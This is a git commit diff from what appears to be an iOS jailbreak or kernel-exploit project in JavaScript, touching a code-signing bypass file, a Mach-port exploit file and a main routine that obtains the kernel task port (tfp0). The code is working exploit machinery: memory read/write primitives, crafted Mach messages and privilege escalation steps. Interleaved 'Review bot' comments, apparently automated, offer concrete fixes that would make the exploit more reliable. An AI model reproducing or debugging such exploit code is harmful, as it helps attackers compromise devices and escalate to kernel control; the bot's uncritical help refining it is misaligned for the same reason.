authorspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
committerspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
commit42647b796f0f54122e7f46522d8e681825daf54b (patch)
tree6886bfea221b15579b84ff13d1b850a1ac9f5fcf /src
parentd1da310f02adc0e9b5f8656ea063fd3231901611 (diff)
dump
Diffstat (limited to 'src')
-rw-r--r--src/js/csbypass.js2
-rwxr-xr-xsrc/js/kexp/exploit.js8
-rw-r--r--src/js/main.js6
3 files changed, 10 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 8f7a56e..3065099 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) {
printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test);
+ call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
printf("fuck1\n");
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
printf("fuck2\n");
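Review bot: The rewritten CFDictionarySetValue call on the `+` line passes a doubly dereferenced key, `read_u32(read_u32(my_kIOSurfaceBytesPerRow))`, while the call for `my_kIOSurfaceWidth` two lines below still goes through `callnarg` with four single-dereferenced u32 words of the same kind of global; both keys should be the same type (presumably a CFStringRef loaded from a kIOSurface* constant), so at most one of the two conventions can be right. The value argument `test` is only ever shown as a `%p` in the printf above, so what it points at is not stated anywhere in the hunk. I would settle on one calling form for both lines, e.g. `call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceWidth)), <cfnumber>, 0);`, and add a comment such as `// key: CFStringRef read from the kIOSurface* global; value: test (TODO state what it is)`. memcpy_exec starts before this hunk and continues after it.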
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x24, 0x0213c600);
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
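Review bot: The new `write_u32(InP + 0x24, 0x0213c600)` replaces a self-describing expression with an undocumented magic number, and the two are not equivalent: assuming MACH_MSG_OOL_PORTS_DESCRIPTOR is the usual 2, the old expression evaluated to 0x02130000 (descriptor type in the top byte, disposition 19 below it), whereas the new value additionally sets 0xc6 in bits 8-15, which on the usual 32-bit OOL-ports descriptor layout is the copy-options field. If that is intended, keep the symbolic form and state why, e.g. `write_u32(InP + 0x24, (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24) | (19 << 16) | (0xc6 << 8)); // copy=0xc6: <reason>`; if it is a value pasted from a crash dump, say so in the comment instead. r3gister's body continues on both sides of this hunk.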
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
+ var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, 0);
+ write_u32(arrz, arrz2);
+ write_u32(arrz2, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
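Review bot: The new `arrz2` indirection is not explained: `arrz` is handed to mach_ports_lookup as what is presumably its out-pointer, so pre-seeding `*arrz` with a 4-byte chunk holding 0 only matters if the call fails or leaves it untouched, and in that case the later `read_u32(read_u32(arrz) + 8)` in this function reads 8 bytes past the 4 bytes `shit_heap(4)` handed out. A comment on the `+` lines saying what the seed is for would help, e.g. `// seed *arrz with a valid zeroed pointer so a failed lookup leaves nothing unmapped to dereference`, and if that is the intent the chunk should be sized for the reads that follow, `var arrz2 = shit_heap(12);`. mach_ports_lookup_shit continues past this hunk.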
@@ -359,6 +361,7 @@ function mach_ports_lookup_shit() {
// var mts = mach_task_self();
printf("fuck\n");
calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
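Review bot: The result of `calls4arg("mach_ports_lookup", ...)` is still discarded, and the new debug printf plus the `return read_u32(read_u32(arrz) + 8)` two lines below read port index 2 from the returned array without consulting the count written to `sz`; on a failed call or a count below 3 they dereference whatever `*arrz` happens to hold. Assuming calls4arg returns the callee's result the way callnarg does elsewhere in this commit, I would check both before reading: `var kr = calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);` / `if (kr !== 0 || read_u32(sz) < 3) { printf("mach_ports_lookup kr=%x count=%x\n", kr, read_u32(sz)); return 0; }`. The added printf also references `kp`, which is not defined in this function within the hunk; unless it is a global, moving the line here from the top-level loop turns it into a ReferenceError. mach_ports_lookup_shit starts before this hunk.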
@@ -461,7 +464,6 @@ again: while (true) {
// while (true) {
//
// }
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("fuck\n");
// var fake_port = read_u32(read_u32(arrz) + 8);
diff --git a/src/js/main.js b/src/js/main.js
index 5c45e85..75d730d 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -77,14 +77,16 @@ function main() {
large_buf[0] = 0x41424344;
printf("%x\n", read_u32(large_buf_ptr));
+ setup_fancy_rw();
+
// csbypass();
// return;
- setup_fancy_rw();
printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
-
+
+//return;
var tfp0 = get_kernel_task();
printf("tfp0=%x\n", tfp0);